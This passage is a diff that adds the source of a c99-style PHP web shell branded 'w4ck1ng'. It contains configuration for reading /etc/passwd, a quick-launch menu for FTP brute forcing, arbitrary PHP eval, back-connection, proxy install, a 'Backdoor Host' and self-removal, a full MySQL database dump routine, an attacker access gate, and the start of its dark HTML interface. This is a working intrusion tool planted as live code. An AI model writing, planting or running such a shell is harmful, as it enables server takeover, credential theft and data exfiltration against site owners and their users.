+ "html"=>array("html","htm","shtml"),
+ "txt"=>array("txt","c",".bash_history","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+ "exe"=>array("sh","install","bat","cmd"),
+ "ini"=>array("ini","inf"),
+ "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+ "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+ "sdb"=>array("sdb"),
+ "phpsess"=>array("sess"),
+ "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+
+$exeftypes  = array(
+ getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+ "perl %f%" => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=\"yellow\">","</font>"), // example
+  array("config.php",1) // example
+);
+$safemode_diskettes = array("a"); 
+$hexdump_lines = 8;// lines in hex preview file
+$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
+$nixpwdperpage = 100; // Get first N lines from /etc/passwd
+
+
+$sess_cookie = "c99shvars"; // Cookie-variable name
+
+
+
+//Quick launch
+$quicklaunch = array(
+ array("<hr><b>[Home]</b>",$surl),
+ array("<b>[Search]</b>",$surl."act=search&d=%d"),
+ array("<b>[Encoder]</b>",$surl."act=encoder&d=%d"),
+ array("<b>[Processes]</b>",$surl."act=processes&d=%d"),
+ array("<b>[FTP Brute Forcer]</b>",$surl."act=ftpquickbrute&d=%d"),
+ array("<b>[Server Information]</b>",$surl."act=security&d=%d"),
+ array("<b>[SQL Manager]</b>",$surl."act=sql&d=%d"),
+ array("<b>[Eval PHP code]</b>",$surl."act=eval&d=%d&eval=//readfile('/etc/passwd');"),
+ array("<b>[Back-Connection]</b>",$surl."act=backc"),
+ array("<b>[Self remove]</b>",$surl."act=selfremove"),
+ array("<b>[Install Proxy]</b>",$surl."act=proxy"),
+ array("<b>[Backdoor Host]</b>",$surl."act=shbd"),
+);
+
+//Highlight-code colors
+$highlight_background = "#c0c0c0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["c99shcook"]);
+
+//END CONFIGURATION
+
+
+// \/Next code isn't for editing\/
+@set_time_limit(0);
+$tmp = array();
+foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("Access Denied");}
+if (!empty($login))
+{
+ if (empty($md5_pass)) {$md5_pass = md5($pass);}
+ if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass))
+ {
+  if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace("&nbsp;|<br>"," ",$donated_html));}
+  header("WWW-Authenticate: Basic realm=\"".$login_txt."\"");
+  header("HTTP/1.0 401 Unauthorized");
+  exit($accessdeniedmess);
+ }
+}
+if ($act != "img"){
+$lastdir = realpath(".");
+chdir($curdir);
+if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;}
+$sess_data = unserialize($_COOKIE["$sess_cookie"]);
+if (!is_array($sess_data)) {$sess_data = array();}
+if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
+if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
+
+$disablefunc = @ini_get("disable_functions");
+if (!empty($disablefunc))
+{
+ $disablefunc = str_replace(" ","",$disablefunc);
+ $disablefunc = explode(",",$disablefunc);
+}
+
+if (!function_exists("c99_buff_prepare"))
+{
+function c99_buff_prepare()
+{
+ global $sess_data;
+ global $act;
+ foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));}
+ $sess_data["copy"] = array_unique($sess_data["copy"]);
+ $sess_data["cut"] = array_unique($sess_data["cut"]);
+ sort($sess_data["copy"]);
+ sort($sess_data["cut"]);
+ if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}}
+ else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}}
+}
+}
+c99_buff_prepare();
+if (!function_exists("c99_sess_put"))
+{
+function c99_sess_put($data)
+{
+ global $sess_cookie;
+ global $sess_data;
+ c99_buff_prepare();
+ $sess_data = $data;
+ $data = serialize($data);
+ setcookie($sess_cookie,$data);
+}
+}
+foreach (array("sort","sql_sort") as $v)
+{
+ if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+ if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+}
+if ($sort_save)
+{
+ if (!empty($sort)) {setcookie("sort",$sort);}
+ if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+}
+if (!function_exists("str2mini"))
+{
+function str2mini($content,$len)
+{
+ if (strlen($content) > $len)
+ {
+  $len = ceil($len/2) - 2;
+  return substr($content, 0,$len)."...".substr($content,-$len);
+ }
+ else {return $content;}
+}
+}
+if (!function_exists("view_size"))
+{
+function view_size($size)
+{
+ if (!is_numeric($size)) {return FALSE;}
+ else
+ {
+  if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";}
+  elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";}
+  elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";}
+  else {$size = $size . " B";}
+  return $size;
+ }
+}
+}
+if (!function_exists("fs_copy_dir"))
+{
+function fs_copy_dir($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_copy_obj"))
+{
+function fs_copy_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (!is_dir(dirname($t))) {mkdir(dirname($t));}
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_copy_dir($d,$t);
+ }
+ elseif (is_file($d)) {return copy($d,$t);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_move_dir"))
+{
+function fs_move_dir($d,$t)
+{
+ $h = opendir($d);
+ if (!is_dir($t)) {mkdir($t);}
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   $ret = TRUE;
+   if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);}
+   else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}}
+   if (!$ret) {return $ret;}
+  }
+ }
+ closedir($h);
+ return TRUE;
+}
+}
+if (!function_exists("fs_move_obj"))
+{
+function fs_move_obj($d,$t)
+{
+ $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+ $t = str_replace("\\",DIRECTORY_SEPARATOR,$t);
+ if (is_dir($d))
+ {
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;}
+  return fs_move_dir($d,$t);
+ }
+ elseif (is_file($d))
+ {
+  if(copy($d,$t)) {return unlink($d);}
+  else {unlink($t); return FALSE;}
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("fs_rmdir"))
+{
+function fs_rmdir($d)
+{
+ $h = opendir($d);
+ while (($o = readdir($h)) !== FALSE)
+ {
+  if (($o != ".") and ($o != ".."))
+  {
+   if (!is_dir($d.$o)) {unlink($d.$o);}
+   else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);}
+  }
+ }
+ closedir($h);
+ rmdir($d);
+ return !is_dir($d);
+}
+}
+if (!function_exists("fs_rmobj"))
+{
+function fs_rmobj($o)
+{
+ $o = str_replace("\\",DIRECTORY_SEPARATOR,$o);
+ if (is_dir($o))
+ {
+  if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;}
+  return fs_rmdir($o);
+ }
+ elseif (is_file($o)) {return unlink($o);}
+ else {return FALSE;}
+}
+}
+if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}}
+if (!function_exists("view_perms"))
+{
+function view_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$type = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
+ else {$type = "?";}
+
+ $owner["read"] = ($mode & 00400)?"r":"-";
+ $owner["write"] = ($mode & 00200)?"w":"-";
+ $owner["execute"] = ($mode & 00100)?"x":"-";
+ $group["read"] = ($mode & 00040)?"r":"-";
+ $group["write"] = ($mode & 00020)?"w":"-";
+ $group["execute"] = ($mode & 00010)?"x":"-";
+ $world["read"] = ($mode & 00004)?"r":"-";
+ $world["write"] = ($mode & 00002)? "w":"-";
+ $world["execute"] = ($mode & 00001)?"x":"-";
+
+ if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
+ if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
+ if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
+
+ return $type.join("",$owner).join("",$group).join("",$world);
+}
+}
+if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+if (!function_exists("parse_perms"))
+{
+function parse_perms($mode)
+{
+ if (($mode & 0xC000) === 0xC000) {$t = "s";}
+ elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
+ elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
+ elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
+ elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
+ elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
+ elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
+ else {$t = "?";}
+ $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
+ $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
+ $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
+ return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w);
+}
+}
+if (!function_exists("parsesort"))
+{
+function parsesort($sort)
+{
+ $one = intval($sort);
+ $second = substr($sort,-1);
+ if ($second != "d") {$second = "a";}
+ return array($one,$second);
+}
+}
+if (!function_exists("view_perms_color"))
+{
+function view_perms_color($o)
+{
+ if (!is_readable($o)) {return "<font color=red>".view_perms(fileperms($o))."</font>";}
+ elseif (!is_writable($o)) {return "<font color=white>".view_perms(fileperms($o))."</font>";}
+ else {return "<font color=green>".view_perms(fileperms($o))."</font>";}
+}
+}
+if (!function_exists("mysql_dump")){
+function mysql_dump($set)
+{
+ global $shver;
+ $sock = $set["sock"];
+ $db = $set["db"];
+ $print = $set["print"];
+ $nl2br = $set["nl2br"];
+ $file = $set["file"];
+ $add_drop = $set["add_drop"];
+ $tabs = $set["tabs"];
+ $onlytabs = $set["onlytabs"];
+ $ret = array();
+ $ret["err"] = array();
+ if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+ if (empty($db)) {$db = "db";}
+ if (empty($print)) {$print = 0;}
+ if (empty($nl2br)) {$nl2br = 0;}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (empty($file))
+ {
+  $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+ }
+ if (!is_array($tabs)) {$tabs = array();}
+ if (empty($add_drop)) {$add_drop = TRUE;}
+ if (sizeof($tabs) == 0)
+ {
+  // retrive tables-list
+  $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+  if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+ }
+ $out = "# Dumped by ".$shver."
+# Home page: http://w4ck1ng.com
+#
+# Host settings:
+# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+# Date: ".date("d.m.Y H:i:s")."
+# DB: \"".$db."\"
+#---------------------------------------------------------
+";
+ $c = count($onlytabs);
+ foreach($tabs as $tab)
+ {
+  if ((in_array($tab,$onlytabs)) or (!$c))
+  {
+   if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+   // recieve query for create table structure
+   $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+   if (!$res) {$ret["err"][] = mysql_smarterror();}
+   else
+   {
+    $row = mysql_fetch_row($res);
+    $out .= $row["1"].";\n\n";
+    // recieve table variables
+    $res = mysql_query("SELECT * FROM `$tab`", $sock);
+    if (mysql_num_rows($res) > 0)
+    {
+     while ($row = mysql_fetch_assoc($res))
+     {
+      $keys = implode("`, `", array_keys($row));
+      $values = array_values($row);
+      foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+      $values = implode("', '", $values);
+      $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+      $out .= $sql;
+     }
+    }
+   }
+  }
+ }
+ $out .= "#---------------------------------------------------------------------------------\n\n";
+ if ($file)
+ {
+  $fp = fopen($file, "w");
+  if (!$fp) {$ret["err"][] = 2;}
+  else
+  {
+   fwrite ($fp, $out);
+   fclose ($fp);
+  }
+ }
+ if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+ return $out;
+}
+}
+if (!function_exists("mysql_buildwhere"))
+{
+function mysql_buildwhere($array,$sep=" and",$functs=array())
+{
+ if (!is_array($array)) {$array = array();}
+ $result = "";
+ foreach($array as $k=>$v)
+ {
+  $value = "";
+  if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+  $value .= "'".addslashes($v)."'";
+  if (!empty($functs[$k])) {$value .= ")";}
+  $result .= "`".$k."` = ".$value.$sep;
+ }
+ $result = substr($result,0,strlen($result)-strlen($sep));
+ return $result;
+}
+}
+if (!function_exists("mysql_fetch_all"))
+{
+function mysql_fetch_all($query,$sock)
+{
+ if ($sock) {$result = mysql_query($query,$sock);}
+ else {$result = mysql_query($query);}
+ $array = array();
+ while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+ mysql_free_result($result);
+ return $array;
+}
+}
+if (!function_exists("mysql_smarterror"))
+{
+function mysql_smarterror($type,$sock)
+{
+ if ($sock) {$error = mysql_error($sock);}
+ else {$error = mysql_error();}
+ $error = htmlspecialchars($error);
+ return $error;
+}
+}
+if (!function_exists("mysql_query_form"))
+{
+function mysql_query_form()
+{
+ global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+ if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+ if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+ if ((!$submit) or ($sql_act))
+ {
+  echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\">&nbsp;<input type=submit value=\"No\"></form></td>";
+  if ($tbl_struct)
+  {
+   echo "<td valign=\"top\"><b>Fields:</b><br>";
+   foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+   echo "</td></tr></table>";
+  }
+ }
+ if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+}
+}
+if (!function_exists("mysql_create_db"))
+{
+function mysql_create_db($db,$sock="")
+{
+ $sql = "CREATE DATABASE `".addslashes($db)."`;";
+ if ($sock) {return mysql_query($sql,$sock);}
+ else {return mysql_query($sql);}
+}
+}
+if (!function_exists("mysql_query_parse"))
+{
+function mysql_query_parse($query)
+{
+ $query = trim($query);
+ $arr = explode (" ",$query);
+ /*array array()
+ {
+  "METHOD"=>array(output_type),
+  "METHOD1"...
+  ...
+ }
+ if output_type == 0, no output,
+ if output_type == 1, no output if no error
+ if output_type == 2, output without control-buttons
+ if output_type == 3, output with control-buttons
+ */
+ $types = array(
+  "SELECT"=>array(3,1),
+  "SHOW"=>array(2,1),
+  "DELETE"=>array(1),
+  "DROP"=>array(1)
+ );
+ $result = array();
+ $op = strtoupper($arr[0]);
+ if (is_array($types[$op]))
+ {
+  $result["propertions"] = $types[$op];
+  $result["query"]  = $query;
+  if ($types[$op] == 2)
+  {
+   foreach($arr as $k=>$v)
+   {
+    if (strtoupper($v) == "LIMIT")
+    {
+     $result["limit"] = $arr[$k+1];
+     $result["limit"] = explode(",",$result["limit"]);
+     if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+     unset($arr[$k],$arr[$k+1]);
+    }
+   }
+  }
+ }
+ else {return FALSE;}
+}
+}
+if (!function_exists("c99fsearch"))
+{
+function c99fsearch($d)
+{
+ global $found;
+ global $found_d;
+ global $found_f;
+ global $search_i_f;
+ global $search_i_d;
+ global $a;
+ if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+ $h = opendir($d);
+ while (($f = readdir($h)) !== FALSE)
+ {
+  if($f != "." && $f != "..")
+  {
+   $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== FALSE) || ($a["name_regexp"] and ereg($a["name"],$f));
+   if (is_dir($d.$f))
+   {
+    $search_i_d++;
+    if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;}
+    if (!is_link($d.$f)) {c99fsearch($d.$f);}
+   }
+   else
+   {
+    $search_i_f++;
+    if ($bool)
+    {
+     if (!empty($a["text"]))
+     {
+      $r = @file_get_contents($d.$f);
+      if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";}
+      if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);}
+      if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);}
+      else {$bool = strpos(" ".$r,$a["text"],1);}
+      if ($a["text_not"]) {$bool = !$bool;}
+      if ($bool) {$found[] = $d.$f; $found_f++;}
+     }
+     else {$found[] = $d.$f; $found_f++;}
+    }
+   }
+  }
+ }
+ closedir($h);
+}
+}
+if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}}
+//Sending headers
+@ob_start();
+@ob_implicit_flush(0);
+function onphpshutdown()
+{
+ global $gzipencode,$ft;
+ if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad")))
+ {
+  $v = @ob_get_contents();
+  @ob_end_clean();
+  @ob_start("ob_gzHandler");
+  echo $v;
+  @ob_end_flush();
+ }
+}
+function c99shexit()
+{
+ onphpshutdown();
+ exit;
+}
+header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+header("Cache-Control: no-store, no-cache, must-revalidate");
+header("Cache-Control: post-check=0, pre-check=0", FALSE);
+header("Pragma: no-cache");
+if (empty($tmpdir))
+{
+ $tmpdir = ini_get("upload_tmp_dir");
+ if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+}
+$tmpdir = realpath($tmpdir);
+$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+else {$tmpdir_logs = realpath($tmpdir_logs);}
+if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
+{
+ $safemode = TRUE;
+ $hsafemode = "<font color=red>ON (secure)</font>";
+}
+else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
+$v = @ini_get("open_basedir");
+if ($v or strtolower($v) == "on") {$openbasedir = TRUE; $hopenbasedir = "<font color=red>".$v."</font>";}
+else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
+$sort = htmlspecialchars($sort);
+if (empty($sort)) {$sort = $sort_default;}
+$sort[1] = strtolower($sort[1]);
+$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+@ini_set("highlight.bg",$highlight_bg); //FFFFFF
+@ini_set("highlight.comment",$highlight_comment); //#FF8000
+@ini_set("highlight.default",$highlight_default); //#0000BB
+@ini_set("highlight.html",$highlight_html); //#000000
+@ini_set("highlight.keyword",$highlight_keyword); //#007700
+@ini_set("highlight.string",$highlight_string); //#DD0000
+if (!is_array($actbox)) {$actbox = array();}
+$dspact = $act = htmlspecialchars($act);
+$disp_fullpath = $ls_arr = $notls = null;
+$ud = urlencode($d);
+?>
+
+<html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1251"><meta http-equiv="Content-Language" content="en-us"><title>shell@<?php echo getenv("HTTP_HOST"); ?></title><STYLE>
+TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}
+.style1 {
+	color: #FF0000;
+	font-weight: bold;
+}
+.style2 {font-size: -3}
+</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><div align="center"><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"></p>
+  <p><font size="-3"><span class="style2"></br>
+ <font color="#333333">k1ngw4ck1ng</font><font color="white">w</font><font color="#333333">4ck1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4c</font><font color="white">k</font><font color="#333333">1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck</font><font color="white">1</font><font color="#333333">ngw4ck1ngw4ck1ng</font><font color="white">w4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4ck1ngw</font><font color="white">4</font><font color="#333333">ck1ngw4ck1</font><font color="white">n</font><font color="#333333">gw4c</font><font color="white">k1ng</font><font color="#333333">w4ck1ngw4ck1ngw4ck1ngw4ck1ng</font><br>
+
+      <font color="#333333">w4ck1ngw4c</font><font color="white">k1n</font><font color="#333333">gw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ngw4ck1n</font><font color="#333333">gw</font><font color="white">4ck1n</font><font color="#333333">g</font><font color="white">w</font><font color="#333333">4ck1ngw4ck</font><font color="white">1ngw4</font><font color="#333333">ck</font><font color="white">1ng</font><font color="#333333">w4ck1n</font><font color="white">gw4ck1</font><font color="#333333">ngw4ck</font><font color="white">1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck</font><font color="#333333">1ngw4ck1ngw4ck1ngw4ck1ngw4ck</font><br>
+
+      <font color="#333333">1ngw4ck1ng</font><font color="white">w4ck</font><font color="#333333">1ngw</font><font color="white">4ck1</font><font color="#333333">ngw4</font><font color="white">ck1</font><font color="#333333">ng</font><font color="white">w4c</font><font color="#333333">k1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1</font><font color="#333333">ngw</font><font color="white">4</font><font color="#333333">ck</font><font color="white">1ngw4ck1ng</font><font color="#333333">w</font><font color="white">4ck</font><font color="#333333">1ng</font><font color="white">w4ck1n</font><font color="#333333">gw4ck1ngw</font><font color="white">4ck</font><font color="#333333">1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">c</font><font color="white">k1ngw</font><font color="#333333">4ck1n</font><font color="white">gw4ck1ngw4ck</font><font color="#333333">1ngw4ck1ngw</font><br>
+
+      <font color="#333333">4ck1ngw4ck1</font><font color="white">ngw4</font><font color="#333333">ck</font><font color="white">1ngw4</font><font color="#333333">ck1</font><font color="white">ngw4</font><font color="#333333">ck1ngw</font><font color="white">4ck1</font><font color="#333333">n</font><font color="white">gw4</font><font color="#333333">ck1</font><font color="white">ngw4ck</font><font color="#333333">1ngw4</font><font color="white">ck</font><font color="#333333">1</font><font color="white">ngw4ck1n</font><font color="#333333">gw4ck1ngw4ck</font><font color="white">1ngw</font><font color="#333333">4ck1ngw4</font><font color="white">ck1n</font><font color="#333333">g</font><font color="white">w4ck1ngw4ck</font><font color="#333333">1ngw4c</font><font color="white">k1ngw</font><font color="#333333">4ck1ngw4ck1</font><br>
+
